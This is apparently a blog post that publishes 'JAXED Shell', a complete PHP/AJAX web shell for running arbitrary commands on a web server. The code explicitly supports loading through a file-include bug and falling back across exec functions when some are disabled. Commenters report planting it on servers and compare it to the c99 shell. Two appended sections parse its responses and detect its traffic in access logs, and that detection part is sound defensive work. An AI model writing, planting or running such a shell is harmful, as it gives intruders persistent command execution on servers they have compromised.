Dec 19

A while back, when I was first learning AJAX, I decided to write an interactive PHP/JavaScript shell for executing commands on a server. All the others I found either didn't handle directories well, were far too bulky, or were backdoored. So I now present JAXED Shell. I haven't tested it extensively, but it should work in the majority of situations.

Enjoy :)
Commands:

home - return to the shell's home directory (the directory the script was started from)
clear - clear the history box
up/down arrow - step through previous commands
right arrow - file name completion for the last word on the line (a single match is filled in; several matches are only listed)

<?php
// JAXED Shell: a single PHP file that serves its own AJAX front end and answers
// three GET parameters: ajxcmd (run a command), qf (file name completion) and
// dr (print the working directory).
@session_start();
// The working directory persists across requests in the session; default to the
// directory the script started in.
if(empty($_SESSION['work_dir'])) $_SESSION['work_dir'] = getcwd();
$tmp_wd = $_SESSION['work_dir'];
// If this file was pulled in through an include (for instance a file-include bug),
// the AJAX requests have to go back to the including script, so keep the request
// URI up to its first '&'; otherwise the script's own name will do.
if(count(get_included_files()) > 1) list($me) = explode('&', $_SERVER['REQUEST_URI']);
else $me = $_SERVER['SCRIPT_NAME'] . '?';

// Return the first command-execution function not listed in disable_functions,
// or false when every one of them is. disable_functions is comma-separated, so
// compare whole names: a substring test (strpos) would report exec() as disabled
// whenever shell_exec() is.
function get_exec_function(){
	$exec_functions = array('popen', 'exec', 'shell_exec', 'system', 'passthru');
	$disabled = array_map('trim', explode(',', ini_get('disable_functions')));
	foreach($exec_functions as $f) if(!in_array($f, $disabled)) return $f;
	return false;
}
// Run $command with whichever function is available, folding stderr into stdout.
function execute_command($exec_function, $command){
	$command = $command . " 2>&1";
	switch($exec_function){
		case 'popen': $h = popen($command, 'r'); while(!feof($h)) echo(fgets($h)); pclose($h); break;
		case 'exec': exec($command, $result); foreach($result as $r) echo($r . "\n"); break;
		case 'shell_exec': echo(shell_exec($command)); break;
		case 'system': system($command); break;
		case 'passthru': passthru($command); break;
	}
}
if(!empty($_GET['ajxcmd'])){
	@set_time_limit(4);
	// PHP has already URL-decoded $_GET; decoding a second time would turn a literal
	// '+' into a space. Only undo magic_quotes (old PHP) when it is on.
	$cmd = (ini_get('magic_quotes_gpc')) ? stripslashes($_GET['ajxcmd']) : $_GET['ajxcmd'];
	if($cmd == 'home') $_SESSION['work_dir'] = getcwd();
	elseif($exec_function = get_exec_function()){
		// 'cd' is handled here instead of being passed to the shell: every request is
		// a fresh process, so a directory change made there would be lost at once.
		if(preg_match('/^cd(\s|$)/', $cmd)){
			$parts = explode(' ', $cmd);
			$c = array_pop($parts);
			$rel = $_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c;
			if($c === '') echo("Invalid directory\n");
			elseif($c[0] != '/' && $c[0] != '\\' && @is_dir($rel)) $_SESSION['work_dir'] = realpath($rel);
			elseif($c[0] != '.' && @is_dir($c)) $_SESSION['work_dir'] = realpath($c);
			else echo("Invalid directory\n");
		}
		else{
			@chdir($_SESSION['work_dir']);
			execute_command($exec_function, $cmd);
		}
	}
	else die('All execution methods disabled.');
}
elseif(!empty($_GET['qf'])){
	// File name completion: glob the prefix in the working directory and return the
	// matches tab-separated; a single match comes back bare so the client can splice it in.
	@set_time_limit(4);
	$qf = (ini_get('magic_quotes_gpc')) ? stripslashes($_GET['qf']) : $_GET['qf'];
	@chdir($_SESSION['work_dir']);
	$res = glob($qf . "*");
	if($res) echo(implode("\t", $res));
}
elseif(!empty($_GET['dr'])){
	echo($_SESSION['work_dir']);
}
else{?>
<html>
<head>
<title>JAXED Shell</title>
<style>
body { background-color:#000000; color:#BFBFBF; font-family:Verdana; font-size:11px; }
input,textarea { color:#BFBFBF; background-color:#000000; border:1px solid #3F3F3F; font-family:Courier; font-size:11px; width:100%; }
textarea { border:0px; overflow: auto;height:90%; }
</style>
<script>
var http = null;
var hist = [];     // command history, oldest first
var i = -1;        // history cursor: -1 = the line currently being typed
var qfpat = "";    // prefix sent with the last completion request
var cmd = "";      // command sent with the last exec request
// 'char' is a reserved word in ECMAScript 3, so the key handler gets another name.
function key_down(e){
	var k = (window.event) ? e.keyCode : e.which;
	var c = document.getElementById('c');
	if(k == 13){                                    // Enter: run the line (or clear)
		cmd = c.value;
		if(cmd == 'clear') document.getElementById('history').value = '';
		else if(cmd != '') x('ajxcmd', encodeURIComponent(cmd), handle_exec);
		if(cmd != '') hist.push(cmd);
		c.value = '';
		i = -1;
	}
	else if(k == 38){ if(i < hist.length-1) i++; }  // Up: older entry
	else if(k == 40){ if(i > -1) i--; }             // Down: newer entry
	else if(k == 39){                               // Right: complete the last word
		qfpat = c.value.split(" ").pop();
		if(qfpat != "") x('qf', encodeURIComponent(qfpat), handle_qf);
	}
	if(k == 38 || k == 40) c.value = (hist[hist.length-1-i] != undefined) ? hist[hist.length-1-i] : '';
}
// Fire one GET back at this script. encodeURIComponent() is used rather than
// escape(), which leaves '+' unencoded and so has PHP read it as a space.
function x(variable, value, handle_response){
	if (window.XMLHttpRequest) http = new XMLHttpRequest();
	else if (window.ActiveXObject) http = new ActiveXObject("Microsoft.XMLHTTP");
	if(http){
		http.onreadystatechange = handle_response;
		http.open("GET", "<?php echo($me); ?>" + "&" + variable + "=" + value, true);
		http.send(null);
	}
	else alert('Unable to create XMLHttpRequest object');
}
function handle_qf(){
	if(http.readyState == 4){
		var c = document.getElementById('c');
		var res = http.responseText;
		// Exactly one match: splice it over the prefix (the last word of the line).
		// No match (empty response) or several matches: leave the line alone and
		// just list them in the history box. Plain string arithmetic is used here
		// because building a RegExp from the typed prefix breaks on characters
		// such as '[' or '.'.
		if(res != "" && res.indexOf("\t") == -1){
			var last = c.value.split(" ").pop();
			c.value = c.value.substring(0, c.value.length - last.length) + res;
		}
		document.getElementById('history').value += '# ' + qfpat + '\n' + res + '\n';
		document.getElementById('history').scrollTop = document.getElementById('history').scrollHeight;
	}
}
function handle_exec(){
	if(http.readyState == 4){
		var res = http.responseText;
		// The server appends "<<(new working dir)>>" after the output when 'cd' or
		// 'home' changed it. Only a marker at the very end of the response counts,
		// so command output that happens to contain the same pattern is left alone.
		var out = res, end = res.replace(/\s+$/, '');
		var start = end.lastIndexOf('<<(');
		if(start != -1 && end.substring(end.length - 3) == ')>>'){
			document.getElementById('dir').value = end.substring(start + 3, end.length - 3);
			out = res.substring(0, start);
		}
		document.getElementById('history').value += '# ' + cmd + '\n' + out;
		document.getElementById('history').scrollTop = document.getElementById('history').scrollHeight;
	}
}
</script></head>
<body onLoad="document.getElementById('c').focus(); document.getElementById('history').scrollTop = document.getElementById('history').scrollHeight;">
<input type="text" id="c" onKeyDown="key_down(event);" style="width:70%;"><input type="text" id="dir" style="width:30%;" readonly value="<?php echo(htmlspecialchars($_SESSION['work_dir'])); ?>"><br><textarea id="history"></textarea>
</body></html>
<?php }
// Tell the client about a directory change by appending a marker after the output.
// No closing ?> tag: stray whitespace after it would end up in every AJAX response.
if($_SESSION['work_dir'] != $tmp_wd) echo("<<(" . realpath($_SESSION['work_dir']) . ")>>");
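The two response formats the PHP sends back to the browser, parsed as plain functions so they can be run and checked in Node without a server. This is an added example, not code from the JAXED Shell post; the wire format it assumes is the one the script above emits (an exec response is the command output followed by `<<(realpath)>>` only when the working directory changed, and a qf response is the glob matches joined by a tab, or nothing at all when there was no match). The sample responses at the bottom are constructed.

```javascript
// Added example, not part of the original JAXED Shell post: the two response
// formats the shell's PHP sends back to its JavaScript, parsed as plain functions
// so they can be exercised in Node without a browser or a server. Assumed wire
// format (taken from the PHP above):
//   exec response : command output, then "<<(" + realpath(dir) + ")>>" appended
//                   only when 'cd' or 'home' changed the working directory;
//   qf response   : glob() matches joined by "\t", or "" when nothing matched.

// Split an exec response into {output, dir}. Only a marker at the very end of
// the response is treated as the shell's own. The page's original handler
// stripped the FIRST "<<(...)>>" found anywhere, so output that merely contained
// that pattern would have been cut out and shown in the dir box.
function parseExecResponse(text) {
  const trimmed = text.replace(/\s+$/, '');
  if (!trimmed.endsWith(')>>')) return { output: text, dir: null };
  const start = trimmed.lastIndexOf('<<(');
  if (start === -1) return { output: text, dir: null };
  return { output: text.slice(0, start), dir: trimmed.slice(start + 3, -3) };
}

// Apply a qf (completion) response to the command line. Exactly one match is
// spliced over the prefix (the last space-separated word); none or several leave
// the line untouched and are only reported. Two details the original handler got
// wrong: an empty response made "".split("\t").length == 1 true, so a prefix with
// no match was replaced by nothing, and the prefix was compiled into a RegExp
// unescaped, so "foo[1" threw a SyntaxError and "a.b" matched more than it should.
function applyCompletion(line, qfResponse) {
  const matches = qfResponse === '' ? [] : qfResponse.split('\t');
  if (matches.length !== 1) return { line: line, matches: matches };
  const prefix = line.split(' ').pop();
  return { line: line.slice(0, line.length - prefix.length) + matches[0], matches: matches };
}

// Constructed responses, shaped as the PHP above would return them.
console.log(parseExecResponse('total 0\n<<(/tmp)>>'));                  // dir becomes /tmp
console.log(parseExecResponse('<<(/fake)>>\n<<(/etc)>>'));              // output keeps the fake marker
console.log(applyCompletion('cat foo[1', 'foo[1].txt'));                // line becomes "cat foo[1].txt"
console.log(applyCompletion('ls /etc/pa', '/etc/pam.d\t/etc/passwd')); // ambiguous: line unchanged
```

One limitation remains even with the end-anchored parse: the marker is in-band, so a command whose output ends with text of the same shape is indistinguishable from a real directory change. The script already answers a separate `dr` request with the working directory, so a client that wants certainty can ask for it out of band after each command instead of parsing the output.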
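From the other side of the wire: what this shell looks like in a web server access log. This is an added example, not part of the original post or the shell itself. It relies only on what the script above does: the client builds every request as script name, `?`, `&`, parameter, so the query string starts with `&` and carries a single parameter, and the PHP answers `ajxcmd`, `qf` and `dr` (the shipped client only ever sends the first two). The log lines are constructed for the example in combined log format, and the `suspicious` verdict is this example's own heuristic.

```javascript
// Added example, not part of the original post: spotting JAXED Shell traffic in a
// web server access log. Every request the client above makes is built as
//   "<script>?" + "&" + name + "=" + value
// so the query string starts with "&" and carries exactly one parameter. The PHP
// answers ajxcmd (run a command), qf (completion) and dr (working directory);
// 'clear' and the history keys never leave the browser, so they leave no trace.
// The log lines below are constructed for this example (combined log format).

const COMBINED = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /;
const SHELL_PARAMS = ['ajxcmd', 'qf', 'dr'];

// Minimal query-string parser; the leading "&" yields an empty pair that is skipped.
function parseQuery(qs) {
  const params = {};
  for (const pair of qs.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const raw = eq === -1 ? '' : pair.slice(eq + 1);
    try { params[key] = decodeURIComponent(raw.replace(/\+/g, ' ')); }
    catch (e) { params[key] = raw; }   // malformed %-escape: keep the raw value
  }
  return params;
}

// Classify one log line. Returns null for lines carrying none of the shell's
// parameters; otherwise the decoded request plus a 'suspicious' verdict. An
// ordinary application may legitimately use a parameter called qf, so the verdict
// (a heuristic of this example) also requires the client's tell-tale shape:
// a leading "&" and no other parameters.
function classifyLine(line) {
  const m = line.match(COMBINED);
  if (!m) return null;
  const ip = m[1], method = m[2], target = m[3], status = Number(m[4]);
  const q = target.indexOf('?');
  if (method !== 'GET' || q === -1) return null;
  const path = target.slice(0, q);
  const qs = target.slice(q + 1);
  const params = parseQuery(qs);
  const param = SHELL_PARAMS.find(p => Object.prototype.hasOwnProperty.call(params, p));
  if (!param) return null;
  const suspicious = qs.charAt(0) === '&' && Object.keys(params).length === 1;
  return { ip: ip, path: path, status: status, param: param, value: params[param], suspicious: suspicious };
}

// Return only the lines judged to be shell traffic.
function scanLog(lines) {
  return lines.map(classifyLine).filter(r => r !== null && r.suspicious);
}

// Constructed sample: one innocent page view, three shell requests against an
// uploaded script, and an ordinary search page that happens to use a 'qf' parameter.
const SAMPLE_LOG = [
  '203.0.113.7 - - [19/Dec/2008:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 3127 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [19/Dec/2008:10:00:05 +0000] "GET /uploads/img.php?&ajxcmd=whoami HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [19/Dec/2008:10:00:09 +0000] "GET /uploads/img.php?&ajxcmd=cd%20%2Fetc HTTP/1.1" 200 11 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [19/Dec/2008:10:00:12 +0000] "GET /uploads/img.php?&qf=pass HTTP/1.1" 200 24 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [19/Dec/2008:10:01:00 +0000] "GET /search.php?qf=widgets&page=2 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"'
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.ip + ' ' + hit.path + ' ' + hit.param + '=' + JSON.stringify(hit.value) + ' -> ' + hit.status);
}
```

Because every command travels in the query string, a hit also hands you the command itself, which is why the sample's `cd%20%2Fetc` decodes cleanly to `cd /etc`. If the shell is reached through a file-include bug rather than as an uploaded file, the path in the log is the including script's and the include parameter sits in front of the `&`; the parameter-based check still fires, but the leading-`&` test does not, so drop that half of the verdict when hunting for that case.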

6 Responses

  1. Tuareg Says:

    Hey, I just tried your JAXED Shell on a Linux server, but it doesn't work. When I tried the help command I got a 404 error, and other commands like pwd or just whoami gave me a 406 error. But in a c99 shell I can actually use these commands, so I don't know what's going on.

  2. admin Says:

    Are you using it within a remote file include vulnerability or have you uploaded the file?

  3. Tuareg Says:

    I uploaded the file

  4. admin Says:

    Hmm... I'm not quite sure what the problem is. Probably all the command execution methods are disabled, or some server setting is preventing it. That, or you have JavaScript disabled. It works fine for me on my BSD box, so I don't think it's *nix in general.

  5. tr3intaydos Says:

    I tested it on Windows with XAMPP and it works great.

  6. Tuareg Says:

    Mmmm, I tried the JAXED shell on an unprotected *nix system on which remote execution of commands is allowed, and when I tried it JavaScript was enabled, so I actually don't know what's going on... But I think it's a cool idea, a shell based on Ajax and PHP.
